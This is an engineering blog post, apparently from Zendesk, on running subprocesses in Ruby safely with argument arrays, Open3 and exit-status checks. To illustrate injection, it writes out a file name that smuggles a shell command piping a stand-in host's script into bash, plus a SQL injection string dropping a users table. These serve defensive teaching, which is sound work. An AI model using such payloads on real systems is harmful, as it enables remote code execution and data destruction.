Running a child process in Ruby (properly)

We use Ruby a lot here at Zendesk, and mostly it works pretty well for us. But one thing that sucks is when it makes the wrong solution easy, and the right solution not just hard, but hard to even find.

Spawning a process is one such scenario. Want to spawn a child process to run some system command? Easy! Just pick the method that’s right for you:

  • `backticks`
  • %x[different backticks]
  • Kernel.system()
  • Kernel.spawn()
  • IO.popen()
  • Open3.capture2, Open3.capture2e, Open3.capture3, Open3.popen2, Open3.popen2e, Open3.popen3

… and that’s ignoring the more involved options, like pairing a Kernel.fork with a Kernel.exec, as well as the many different Open3.pipeline functions.

Obligatory shell picture, © bambe1964 (CC BY-ND 2.0)

What are we doing here?

Often enough, you want to run a system command (i.e. something you might normally run from a terminal) from your Ruby code. You might be running a command just for its side effects (e.g. `chmod` a file), or you might want to use the output of the command in your code (e.g. `tar -tf` to list the contents of a tarball). Most of the above functions will work, but some of them are better than others.

In order to narrow this down, I’m going to make some assumptions:

(aside: there are pure-Ruby ways to perform the tasks in these examples which are likely to be more secure and simpler than invoking an external program written in C. But for clarity I’ve chosen simple examples over realistic ones)

Assumption 1: let’s not get hacked

You’ve probably heard of SQL injection — if you build up a string like:

"select * from users where name = '#{username}'"

… someone will eventually come along and submit a form where

username="'; drop table users; --'"

Whenever you include untrusted data as part of code, you’re likely to see similar issues. SQL is code, which is why we need to cleanly separate SQL commands (trusted) from SQL values (untrusted). This can be seen in ActiveRecord with examples like:

User.find_by(['name = ?', params[:username]])

This doesn’t just smush all the data together, but instead gives it to the SQL processor in a way that it can distinguish code from data.

Of course, `sh` (or `bash`) is a very powerful language — if you make similar errors when invoking subcommands, you can easily allow hackers to do all sorts of nasty things. Consider some code to determine the dimensions of an uploaded image. One way to do that in Ruby (with ImageMagick installed) is:

dimensions = `identify -format '%w x %h' #{filename}`

This will probably work, until someone decides to upload an image named:

'; curl pwnme.example.com | bash;#.jpg'

Oh dear, I hope that domain doesn’t host a malicious script of some sort. And I really hope your account doesn’t have passwordless `sudo`.

Even if your application is only accessible to users you trust, this is still bad code. For example, it will fall over as soon as someone uses a filename with a space in it. Encoding data correctly isn’t just a matter of security — insecure code usually turns out to be buggy as well! And “only trusted users can trigger this code” is one of those statements which can cause an avalanche of curse words months or years down the line when that silently (and then loudly) stops being true.

The solution for running a command is simple: rather than providing a string to be executed by `/bin/sh`, we give the command and its arguments directly as an array of strings. No splitting on spaces, no escaping quotes, no special characters whatsoever. So instead of:

"ls -l #{directory}"

We want to provide:

['ls', '-l', directory]

As a bonus, this cuts out the `sh` interpreter altogether. This saves us the tedious work of applying `sh` escaping rules, running a mostly useless `sh` process, and conveniently sidesteps exploits like the shellshock bug.

Assumption 2: silent errors are bad errors

I have a vendetta against all forms of unhandled error. They pop up in a lot of places:

  • sloppy C code (whenever you forget to check for errors explicitly)
  • a startling amount of bash scripting (unless you `set -eo pipefail` or meticulously check for failed commands with `$?`)
  • do_something(obj) rescue nil (in Ruby)

That last one’s at least explicit about it, but it’s still a big hammer to swing — maybe you expect `do_something(obj)` to fail with a certain error when `obj` is `nil`. But what if someone introduces some other bug into `do_something` which fails for a completely different reason? You’re much better off either checking for the `nil` up front, or rescuing only very specific exceptions.

So if you want to run a shell command, you’d better be checking that the command actually returned with a successful exit status. If you think “this could never fail”, do it anyway. If you’re right, you’ve made sure of it and may proceed to feel smug. If you’re wrong, you might save yourself mild annoyance, hours of debugging, or catastrophic data loss. It’s a win-win.

Elimination round

OK, so firstly anything that uses a plain `sh` string is out. That knocks off the two most convenient options:

  • `backticks`
  • %x[backticks in a funny hat]

The remaining functions accept either a string or an array, so you need to be diligent in making sure you give them an array.

Now, which of these has the best error handing?

Firstly, a lot of these don’t return a status directly. They set the global `$?` object. This is mostly reliable, but kind of icky (it’s a global!)

On the plus side, it’s a thread-safe global — Ruby plays some tricks to make sure it always refers to the last process for this thread.

But it’s still ugly, and while writing up some examples for this post I discovered a sneaky issue with it that I’d never encountered before: it doesn’t always mean what you think it means.

Consider this code:

listing = IO.popen(['ls', directory]).read
raise "it failed!" unless $?.exitstatus == 0
return listing

If `ls` fails (perhaps `directory` doesn’t exist), what happens? It looks like you’ll get an error, but it turns out that you might get an error or return an empty string, depending on the result of some previous, unrelated command. This is because `$?` does not get set by `IO.popen` until you `close` it. i.e. you would need to do:

io = IO.popen(['ls', directory])
listing = io.read
io.close
raise "it failed!" unless $?.exitstatus == 0
return listing

Which is a subtle difference, and not exactly pretty code. If you pass a block to `IO.popen` you won’t have this issue because it’ll call `close` for you, but you’ll need to remember that subtlety.

So although using `$?` can be done correctly, it’s ugly and it introduces the possibility of sneaky bugs. I’d rather avoid it.

What are we left with? Just `Open3`. This is the only option which:

  • accepts an array of arguments, and
  • explicitly returns a status object, rather than using `$?`

One exception is when you just want to run a command, and don’t need to capture its output. For this you can use the humble `Kernel.system()`, which takes an array and returns a boolean. So you’d use it like this:

system('rm', '-r', directory) or raise "Failed to remove #{directory}"

tl;dr: Common Ruby subprocess patterns

a.k.a enough talk, just tell me what to use!

1: You want to run something, but don’t need its output

system('rm', '-r', directory) or raise "Failed to remove #{directory}"

Protip: if you want to run a command without arguments, you should actually use:

system(["ls", "ls"])

…because otherwise `system` will take your single string to be a shell string.

2: You want to capture stdout as a string (and inherit stderr):

This is the most common case, in my experience.

stdout, status = Open3.capture2('unzip', '-l', zipfile)
raise <error> unless status.success?

(you can also pass a `stdin_data: <string>` option if you need to provide some input)

3: You want to capture stdout as a stream:

… because it might be huge, or you want to process each line as it arrives. This allows you to write to `stdin` as a stream, too.

Open3.popen2('unzip', '-l', zipfile) do |stdin, stdout, status_thread|
stdout.each_line do |line|
puts "LINE: #{line}"
end
raise "Unzip failed" unless status_thread.value.success?
end

4: You need to inherit stdin

This is a tricky edge case to figure out from the `open3` docs. Each of the functions in that module support the same options as `Open3.popen3`. Which says that its options are passed through to `Process.spawn`. Which has lots of options for controlling redirections and file descriptors. Unfortunately, the docs don’t mention one crucial point — whatever redirections you pass will be ignored, because `popen3` always overrides the redirection options with its own pipes.

So if you do need to inherit `stdin` and `Kernel#system` won’t do, `IO.popen` may be your only choice. e.g. to inherit `stdin` and read `stdout` as a string:

# I don’t know why you're piping a zip file into `stdin`,
# but I’m not the judging type...
output = IO.popen(['unzip', '-l', '-'], in: :in) do |io|
io.read
end
raise 'unzip failed' unless $?.success?
puts output

Bonus round: avoiding deadlocks

There’s one more gotcha when it comes to dealing with subprocesses: deadlocks. This can be an issue when you want to process both `stdout` and `stderr` of a child. If one of these pipes fill up their OS buffer with unconsumed output, the OS will block the process until somebody reads that buffered data. But if your parent process is busy waiting for the _other_ stream, you’ll get a deadlock. If you do decide to handle both streams yourself, you’ll need to use threads or `select` to read from whichever stream has data. But generally the best advice is to just to:

  • inherit `stderr` or redirect it to a file
  • combine `stderr` and `stdout` via `Open3.popen2e` or something similar

Epilogue, or “the stdlib sucks, let’s use gems!”

The stdlib does contain everything you need, but it also provides plenty of options to avoid — you need to know what you want and which modules can provide that. If you’re just doing this in one or two places, that’s probably fine.

But if you do enough of this that you’re happy to venture outside the standard library, there are some nice looking libraries which may provide a more consistent solution. In particular stripe’s `subprocess` library is promising — I haven’t tried it myself, but it’s a direct port of python’s `subprocess` module, which is one of the best modules I know of for doing this sort of thing. And stripe gets bonus points for explicitly disallowing `sh` syntax — you must provide an array of arguments.